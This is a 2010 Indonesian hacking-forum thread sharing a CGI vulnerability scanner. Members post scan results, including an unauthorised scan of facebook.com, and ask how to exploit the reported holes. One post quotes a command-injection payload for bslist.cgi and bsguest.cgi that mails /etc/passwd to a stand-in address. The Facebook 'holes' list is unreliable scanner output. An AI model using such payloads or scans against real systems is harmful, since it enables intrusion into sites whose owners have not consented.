X-code Professional

X-code Community

Facebook group

Instagram X-code

Twitter

X-code Blog

Panel
Welcome! Anonymous

CGI Vulnerability Scanner

[ { NUM_COMMENT }]

Tempat pembahasan dan tutorial penggunaan tools untuk hacking, security dan forensik komputer.

Moderators: Paman, Xshadow, indounderground

Forum rules
Tool yang diupload oleh member tidak diperiksa oleh kami, mungkin saja terinfeksi oleh malware secara disengaja ataupun tidak, saran kami sebaiknya mendownload tool tersebut dari sumber pembuatnya. Bagi yang buat thread diharapkan menampilkan screenshot tool.

CGI Vulnerability Scanner

Postby poni » Wed Apr 28, 2010 8:15 pm

Image
Code: Select all
Download : http://www.ziddu.com/download/9644394/CGIVulnerabilityScan.zip.html


CGI Vulnerability Scanner adalah tool untuk memeriksa kelemahan CGI pada sebuah web server
.::...Cr3ditz......::....
join us : www.xcode.or.id - 001101
"@ b3tt3r d1g1t4l w0rlD" -- 010110000110001001
User avatar
poni
 
Posts: 1666
Joined: Mon Dec 05, 2005 10:44 am
Location: Indonesia

Re: CGI Vulnerability Scanner

Postby cyber_criminal » Wed Apr 28, 2010 8:45 pm

izin sedot + nyoba mas
:devil :devil :devil
Hacking bukanlah ttng jawaban. Hacking adalah ttng jalan yang kmu ambil untuk mencari jawaban. jika kmu membutuhkan bantuan, jngan bertanya utk mendapatkan jawaban, bertanyalah ttng jalan yang harus kmu ambil utk mencari jawaban utk dirimu sendiri.
cyber_criminal
 
Posts: 145
Joined: Wed Apr 07, 2010 8:55 pm

Re: CGI Vulnerability Scanner

Postby peniru » Wed May 05, 2010 2:25 pm

kk poni ane dah coba n dapet hasil sperti berikut
Code: Select all
Mode: Scan for all CGI holes (Total: 495)

Hole found: iss ../..
Hole found: logs

Scan Complete - 2 holes found.


nah cara exploitasi hole diatas gimana kk?

mohon pencerahannya :devil :devil
.::. My Sign .::.
..noobie Pool..
Pake tools ato tidak bukan masalah yang penting bisa mengerti apa yang dilakukan
[url]karma37.wordpress.com[/url]
[url]koleksiomel.blogspot.co.id[/url]
User avatar
peniru
 
Posts: 387
Joined: Fri Jan 25, 2008 9:12 am
Location: makassar

Re: CGI Vulnerability Scanner

Postby demonbrando » Thu May 06, 2010 12:17 am

ijin sedot ya om poni...manteb dah... :love: :tapa:
jalani hidup ini dengan santai tapi jangan lupa ibadah..
User avatar
demonbrando
 
Posts: 342
Joined: Thu Oct 15, 2009 12:49 am

Re: CGI Vulnerability Scanner

Postby cyber_terror1st » Sun May 16, 2010 11:06 pm

kk masih lum ngerti cara injectnya :omg: :omg: :omg:
i'm cyber_terror1st and i proud what i suppoust to be
cyber_terror1st
 
Posts: 144
Joined: Fri Apr 30, 2010 8:35 pm

Re: CGI Vulnerability Scanner

Postby 3xtr3m3b0y » Mon May 17, 2010 11:51 am

Wew CGI Vulnerability Scanner running perfecto on my Ubuntu...

Image
...n0 l1m17...
User avatar
3xtr3m3b0y
 
Posts: 317
Joined: Wed Apr 22, 2009 5:11 pm
Location: ~[Hacked Machine]~

Re: CGI Vulnerability Scanner

Postby peniru » Mon May 17, 2010 4:37 pm

iseng2 scan facebook pake CGI Vulnerbility Scanner nemu kek gini...

Code: Select all
Host: http://www.facebook.com/
Mode: Scan for all CGI holes (Total: 495)

Hole found: config.sys
Hole found: .fhp
Hole found: access.cnf
Hole found: access.cnf
Hole found: achg.htr
Hole found: addcontent.cfm
Hole found: add_ftp.cgi
Hole found: admcgi contents
Hole found: admin.dll
Hole found: admin.php3
Hole found: admin.pwd
Hole found: administrat.pwd
Hole found: admnlogin
Hole found: advsearch.asp
Hole found: aexp.htr
Hole found: aexp2
Hole found: aexp2.htr
Hole found: aexp2b.htr
Hole found: aexp3.htr
Hole found: aexp4.htr
Hole found: aexp4b.htr
Hole found: aglimpse
Hole found: alibaba hole
Hole found: AnForm2
Hole found: anot.htr
Hole found: anot3.htr
Hole found: AnyBoard.cgi
Hole found: AnyForm2
Hole found: application.cfm
Hole found: application.cfm
Hole found: archie
Hole found: architext_q.cgi
Hole found: args.bat
Hole found: args.bat
Hole found: args.cmd
Hole found: args.cmd
Hole found: ASPSeek
Hole found: AT-admin
Hole found: AT-generate.cgi
Hole found: author.dll
Hole found: authors.pwd
Hole found: autoexec.bat
Hole found: aux check
Hole found: ax-admin.cgi
Hole found: ax.cgi
Hole found: axs.cgi
Hole found: bb-hist.sh
Hole found: bb-hist.sh
Hole found: bdir.htr - sampl
Hole found: beaninfo.cfm
Hole found: bigconf.cgi
Hole found: bizdb1-search.cgi
Hole found: bnbform.cgi
Hole found: Boa?? 8-)
Hole found: BOOZT!
Hole found: bsguest.cgi
Hole found: bslist.cgi
Hole found: c32web.exe 2
Hole found: c32web.exe
Hole found: cachemgr.cgi
Hole found: calendar
Hole found: campas
Hole found: carbo.dll
Hole found: cart.pl
Hole found: cart32.exe
Hole found: cart32clientlist


Code: Select all
 ASPSeek
ASPSeek is an open source search engine software developed by SWsoft.
Several buffer overflow vulnerabilities enable remote attackers to execute code on the web server remotely, with the privileges of the web server.
Exploit:
Code to large to include here. Check a vulnerability search engine for more information.


Code: Select all
bnbform.cgi
form sends a responding email to users with the contents of any file contained in the 'automessage' variable. This can be used to specify any file that is readable by the uid of the webserver.
Exploit:
The exploit is an html form, but was too large to include here. Please search for "bnbform exploit" at a good search engine to get the code.


Code: Select all
bslist.cgi
BSList doesn't filter out ; allowing anyone to execute commands on the server.
Exploit:
This can be exploited by signing up for the mailing list with the email address of:
hacker@example.com;/usr/sbin/sendmail hacker@example.com < /etc/passwd


Code: Select all
bsguest.cgi
The attacker just enters his email address as:
hacker@example.com;/usr/sbin/sendmail hacker@example.com < /etc/passwd
and then the server mails a confirmation letter along with the passwd file to the attacker.


bisa gk yah di exploitasi tuh hole ane masi cupu c... :pusing: :pusing: .... ntu juga baru sebagian hlole yg berhasil di scan pake ni tools
:devil :devil
.::. My Sign .::.
..noobie Pool..
Pake tools ato tidak bukan masalah yang penting bisa mengerti apa yang dilakukan
[url]karma37.wordpress.com[/url]
[url]koleksiomel.blogspot.co.id[/url]
User avatar
peniru
 
Posts: 387
Joined: Fri Jan 25, 2008 9:12 am
Location: makassar

Re: CGI Vulnerability Scanner

Postby X-Volm » Tue Aug 24, 2010 1:37 am

Kayaknya manteb nih...
Trial & error dulu aaahhh.... :malumalu:
X-Volm
 
Posts: 2
Joined: Sat Aug 21, 2010 6:58 pm
Location: Bekasi

Re: CGI Vulnerability Scanner

Postby choiroel » Tue Aug 24, 2010 6:05 am

:ngakak: :ngakak: :ngakak:
langsung ke-TKP
Ketika Agamamu dan aliranmu itu kamu dapatkan dari lahir...gak perlu sok merasa benar...doktrin dan dogma memang begitu
User avatar
choiroel
 
Posts: 106
Joined: Tue Jun 09, 2009 2:19 am
Location: Pati | Yogjakarta

Re: CGI Vulnerability Scanner

Postby choiroel » Tue Aug 24, 2010 7:01 am

Code: Select all
Mode: Scan for all CGI holes (Total: 495)

Hole found: config.sys
Hole found: .fhp
Hole found: access.cnf
Hole found: access.cnf
Hole found: achg.htr
Hole found: addcontent.cfm
Hole found: add_ftp.cgi
Hole found: admcgi contents
Hole found: admin.dll
Hole found: admin.php3
Hole found: admin.pwd
Hole found: administrat.pwd
Hole found: adminlogin
Hole found: admnlogin
Hole found: advsearch.asp
Hole found: aexp.htr
Hole found: aexp2
Hole found: aexp2.htr
Hole found: aexp2b.htr
Hole found: aexp3.htr
Hole found: aexp4.htr
Hole found: aexp4b.htr
Hole found: aglimpse
Hole found: Agoracgi
Hole found: ali check
Hole found: ali get32.exe
Hole found: alibaba hole
Hole found: AnForm2
Hole found: anot.htr
Hole found: anot3.htr
Hole found: AnyBoard.cgi
Hole found: AnyForm2
Hole found: application.cfm
Hole found: application.cfm
Hole found: archie
Hole found: architext_q.cgi
Hole found: args.bat
Hole found: args.bat
Hole found: args.cmd
Hole found: args.cmd
Hole found: ASPSeek
Hole found: AT-admin
Hole found: AT-generate.cgi
Hole found: Auth
Hole found: author.dll
Hole found: authors.pwd
Hole found: autoexec.bat
Hole found: aux check
Hole found: ax-admin.cgi
Hole found: ax.cgi
Hole found: axs.cgi
Hole found: bb-hist.sh
Hole found: bb-hist.sh
Hole found: bdir.htr - sampl
Hole found: beaninfo.cfm
Hole found: bigconf.cgi
Hole found: bizdb1-search.cgi
Hole found: bnbform.cgi
Hole found: Boa?? 8-)
Hole found: BOOZT!
Hole found: bsguest.cgi
Hole found: bslist.cgi
Hole found: c32web.exe 2
Hole found: c32web.exe
Hole found: cachemgr.cgi
Hole found: calendar
Hole found: calender.pl
Hole found: campas
Hole found: carbo.dll
Hole found: cart.pl
Hole found: cart32.exe
Hole found: cart32clientlist
Hole found: catalog.nsf
Hole found: catalog_type.asp
Hole found: catalog_type.asp
Hole found: cc.txt 2
Hole found: cc.txt
Hole found: cfappman
Hole found: cfdocs/root.cfm
Hole found: cfdocs/zero.cfm
Hole found: cfexamples.mdb
Hole found: cfmlsyntaxcheck
Hole found: cfmsytcheck
Hole found: cfsnippets.mdb
Hole found: CGI Counter
Hole found: cgi-lib.pl
Hole found: cgi/cgiproc
Hole found: cgiback.cgi
Hole found: CGImail.exe
Hole found: cgitest.exe
Hole found: cgiwrap
Hole found: classified cgi
Hole found: classifieds.cgi
Hole found: code.php3
Hole found: codebrws.asp 2
Hole found: codebrws.asp
Hole found: com1 check
Hole found: com2 check
Hole found: com3 check
Hole found: con check
Hole found: con/con check
Hole found: config/check.txt
Hole found: config/import.txt
Hole found: config/site.csc
Hole found: convert.bas
Hole found: convert.bas
Hole found: Count.cgi
Hole found: counter.exe
Hole found: cpshost.dll
Hole found: CrazyWWWBoard
Hole found: ct.htx
Hole found: ctgestb.htx
Hole found: ctgestb.idc
Hole found: ctguestb.idc
Hole found: ctss.idc
Hole found: CSVForm
Hole found: cypress.mdb
Hole found: c_download.cgi
Hole found: data/forums.mdb
Hole found: data/realm.mdb
Hole found: database.nsf/
Hole found: DataBase/
Hole found: day5
Hole found: day5a
Hole found: day5copier.cgi
Hole found: dbmlparser.exe
Hole found: DCForum
Hole found: detail.cfm
Hole found: details.htx
Hole found: details.idc
Hole found: details.idc
Hole found: dfire.cgi
Hole found: dig.cgi
Hole found: dig.cgi
Hole found: displayopenedfile.cfm
Hole found: displayTC.pl
Hole found: dispopenfile.cfm
Hole found: docs/codebrws.asp
Hole found: domcfg
Hole found: domcfg.nsf
Hole found: domcfg?open
Hole found: domlog.nsf
Hole found: dos checking
Hole found: download.cgi
Hole found: dsnform.exe
Hole found: dump
Hole found: dvwssr.dll
Hole found: eatme.ida
Hole found: eatme.idc
Hole found: eatme.idq
Hole found: eatme.idw
Hole found: eatme.pl
Hole found: echo.bat
Hole found: edit.pl
Hole found: Email List
Hole found: enter.cgi
Hole found: environ.cgi
Hole found: envout.bat
Hole found: evaluate.cfm
Hole found: ews
Hole found: excite
Hole found: expeval/eval.cfm
Hole found: exprcalc.cfm
Hole found: exprcalc.cfm
Hole found: expressions.cfm
Hole found: EZshopper
Hole found: FAQmanager
Hole found: Fax Survey
Hole found: fileexist.cfm
Hole found: fileexists.cfm
Hole found: fileexists.cfm
Hole found: filemail.cgi
Hole found: filemail.pl
Hole found: files.pl
Hole found: Finger
Hole found: Finger1
Hole found: flexform.cgi
Hole found: fm_shell.asp
Hole found: form.cgi
Hole found: FormHandler.cgi
Hole found: formmail
Hole found: form_results.htm
Hole found: form_results.htm
Hole found: form_results.txt
Hole found: form_results.txt
Hole found: forums_.mdb
Hole found: Fpadmcgi.exe
Hole found: fpadmin.htm
Hole found: fpcount.exe
Hole found: fpcount.exe
Hole found: fpexplore.exe
Hole found: getdoc.cgi
Hole found: getdrvrs.exe
Hole found: getdrvrs.exe
Hole found: getdrvs.exe
Hole found: GetFile.cfm
Hole found: getfile.cfm?
Hole found: gettempdirectory
Hole found: gH.cgi
Hole found: glimpse
Hole found: guestbook.cgi
Hole found: guestbook.pl
Hole found: Guestserver
Hole found: GW5/GWWEB.EXE
Hole found: Handler
Hole found: handler1
Hole found: hello.bat
Hole found: howitworks/codebrws.asp
Hole found: HTML Script
Hole found: htmldocs
Hole found: htsearch
Hole found: iBill Password Management
Hole found: icat
Hole found: ICQweb
Hole found: iisadmin default
Hole found: iisadmin dir
Hole found: iisadmin/ism.dll
Hole found: iisadmpwd
Hole found: iisadmpwd1
Hole found: iisadmpwd2
Hole found: iisadmpwd3
Hole found: iisadmpwd4
Hole found: iisadmpwd5
Hole found: iisadmpwd6
Hole found: iisadmpwd7
Hole found: iisadmpwd8
Hole found: ikonboard
Hole found: imagemap.exe
Hole found: index.asp%81
Hole found: index.asp::$DATA
Hole found: info2www
Hole found: input.bat
Hole found: isapi/srch.htm
Hole found: iss ../..
Hole found: iss dot bug
Hole found: ISS/perl
Hole found: issadmin/bir.htr
Hole found: jdkRqNotify.exe
Hole found: Key to the web
Hole found: Lastlines
Hole found: LinkMax2
Hole found: load_webenv
Hole found: log
Hole found: log.nsf
Hole found: login.cgi
Hole found: logs
Hole found: lpt check
Hole found: lwgate
Hole found: LWGate
Hole found: lwgate.cgi
Hole found: LWGate.cgi
Hole found: MachineInfo
Hole found: MachineInfo
Hole found: maillist.cgi
Hole found: maillist.pl
Hole found: mailtest.nhtml
Hole found: mainframeset.cfm
Hole found: man.sh
Hole found: message.cgi
Hole found: meta.pl
Hole found: minimal.exe
Hole found: mkilog.exe
Hole found: mlog.phtml
Hole found: mountain.cfg
Hole found: mountain.cfg
Hole found: msadc
Hole found: msadc adctest.asp
Hole found: msadcs.dll
Hole found: names.nsf
Hole found: ncl_items.html
Hole found: netauth
Hole found: newdsn.exe
Hole found: newdsn.exe
Hole found: newdsn.exe
Hole found: newpro.cgi
Hole found: news.cgi
Hole found: nlog-smb.cgi
Hole found: nph-error.pl
Hole found: nph-publish
Hole found: nph-test-cgi
Hole found: ntitar.pl
Hole found: openfile.cfm
Hole found: openfile.cfm
Hole found: orders.htm
Hole found: orders.txt
Hole found: orders/checks.txt
Hole found: orders/import.txt
Hole found: parks/detail.cfm
Hole found: passwd
Hole found: passwd.php3
Hole found: passwd.txt
Hole found: password
Hole found: password.txt
Hole found: PDGorderlog
Hole found: perl
Hole found: perl.exe
Hole found: perlshop.cgi
Hole found: PF Display
Hole found: pfdisplay
Hole found: PGPMail
Hole found: PHF
Hole found: PHF.cgi
Hole found: PHF.pp
Hole found: php
Hole found: PHP
Hole found: PHP
Hole found: PHP-Nuke
Hole found: plusmail
Hole found: Poll It
Hole found: postinfo.asp
Hole found: post_query
Hole found: ppdscgi.exe
Hole found: printenv
Hole found: PSCOErrPage.htm
Hole found: publisher
Hole found: PWD
Hole found: PWL
Hole found: query
Hole found: query.asp
Hole found: query.htx
Hole found: query.idc
Hole found: queryhit.htm
Hole found: quikstore.cfg
Hole found: Ralfs chat cgi
Hole found: rdist/expand.c ?
Hole found: realm_.mdb
Hole found: redir.exe
Hole found: redirect
Hole found: register.htm
Hole found: register.htm
Hole found: register.htx
Hole found: register.idc
Hole found: register.txt
Hole found: registrations 2
Hole found: registrations
Hole found: repost.asp
Hole found: responder.cgi
Hole found: rguest.exe
Hole found: rmp_query
Hole found: Robpoll
Hole found: root
Hole found: rpm_query hmm?
Hole found: Sambar
Hole found: sample.htx
Hole found: sample.idc
Hole found: sample2.htx
Hole found: scripts
Hole found: scripts list
Hole found: scripts/run.exe
Hole found: scripts1
Hole found: scripts2
Hole found: scripts3
Hole found: Scriptsa
Hole found: scrp perl?
Hole found: search
Hole found: search.cgi
Hole found: search97.vts
Hole found: secure/.htaccess
Hole found: secure/.wwwacl
Hole found: sendform
Hole found: sendmail.cfm
Hole found: sendmail.cfm
Hole found: SendPage
Hole found: senvironment
Hole found: service.cnf
Hole found: service.cnf
Hole found: service.pwd
Hole found: service.stp
Hole found: service.stp
Hole found: services.cnf
Hole found: services.cnf
Hole found: session
Hole found: SGI infosrch
Hole found: shopper.conf
Hole found: Shopping Cart
Hole found: ShopPlus
Hole found: showcode.asp
Hole found: shtml.dll
Hole found: shtml.exe
Hole found: site.csc
Hole found: siteUserMod.cgi
Hole found: SIX-webboard
Hole found: smpolicy.mdb
Hole found: snorkerz.bat
Hole found: snorkerz.cmd
Hole found: sojourn.cgi
Hole found: sourcewindow.cfm
Hole found: spin_client.cgi
Hole found: srchadm
Hole found: srhadm/admin.idq
Hole found: ss.cfg
Hole found: startstop.html
Hole found: stats
Hole found: stats.prg
Hole found: statsconfig
Hole found: status
Hole found: status.cgi
Hole found: storemgr.pw
Hole found: submit.cgi
Hole found: submit.cgi
Hole found: SuSE sdbsearch.cgi
Hole found: survey.cgi
Hole found: svcacl.cnf
Hole found: svcacl.cnf
Hole found: SWC
Hole found: tablebuild.pl
Hole found: TalkBack
Hole found: Technote
Hole found: Test-CGI
Hole found: test-cgi.tcl
Hole found: test.bat
Hole found: test/test.cgi
Hole found: textcounter.pl
Hole found: Textor Webmasters CGI
Hole found: THC - Backdoor
Hole found: Thinking Arts Store
Hole found: tidfinder.cgi
Hole found: tigvote.cgi
Hole found: today.nsf
Hole found: tools/getdrvrs
Hole found: tools/newdsn.exe
Hole found: tpgnrock
Hole found: tst.bat
Hole found: ultraboard.cgi
Hole found: ultraboard.pl
Hole found: unlg1.1
Hole found: unlg1.2
Hole found: upload
Hole found: upload.asp
Hole found: uploader.exe
Hole found: uploader.exe
Hole found: uploader.exe
Hole found: uploadn.asp
Hole found: uploadx.asp
Hole found: users.pwd
Hole found: view-source
Hole found: view-sousce
Hole found: viewbook.htx
Hole found: viewbook.idc
Hole found: viewexample.cfm
Hole found: viewsrc.cgi
Hole found: visadmin.exe
Hole found: visitor.exe
Hole found: VTI BIN [shtml.dll]
Hole found: VTI BIN [shtml.exe]
Hole found: VTI INF [_vti_inf.html]
Hole found: VTI PVT [administrators.pwd]
Hole found: VTI PVT [authors.pwd]
Hole found: VTI PVT [service.pwd]
Hole found: VTI PVT [users.pwd]
Hole found: vti_bin list
Hole found: w2-msql
Hole found: w3-mspl
Hole found: w3-msql
Hole found: w3proxy.dll
Hole found: w3tvars.pm
Hole found: Wais.pl
Hole found: Web Sendmail
Hole found: webbbs.cgi
Hole found: webbbs.exe
Hole found: webcart/ dir
Hole found: WebDiscount's eShop
Hole found: webdist.cgi
Hole found: WebGais
Hole found: webhits.exe
Hole found: webhits.exe smpl
Hole found: webmap.cgi
Hole found: Webmin
Hole found: WebPage
Hole found: webplus
Hole found: WebSPIRS
Hole found: WebSTART%20LOG
Hole found: webutils.pl
Hole found: WebWho+
Hole found: wguest.exe
Hole found: whois.cgi
Hole found: whois_raw.cgi
Hole found: win-sample.exe
Hole found: wrap
Hole found: wrap1
Hole found: writeto.cnf
Hole found: writeto.cnf
Hole found: www-sql
Hole found: wwwadmin.pl
Hole found: wwwboard.cgi
Hole found: wwwboard.pl
Hole found: wwwuploader.exe
Hole found: wwwwais
Hole found: XITAMI testcgi
Hole found: zml.cgi
Hole found: _vti_adm
Hole found: _vti_aut
Hole found: _vti_aut author
Hole found: _vti_author dll
Hole found: _vti_bin

Scan Complete - 495 holes found.

Kalo udah gini, trus gimana nih....Mohon Pencerahannya... :maaf: :maaf:
Ketika Agamamu dan aliranmu itu kamu dapatkan dari lahir...gak perlu sok merasa benar...doktrin dan dogma memang begitu
User avatar
choiroel
 
Posts: 106
Joined: Tue Jun 09, 2009 2:19 am
Location: Pati | Yogjakarta

{ FACEBOOK_COMMENT }


Return to Tools For Hacking - Security & Computer Forensic

Who is online

Users browsing this forum: No registered users and 14 guests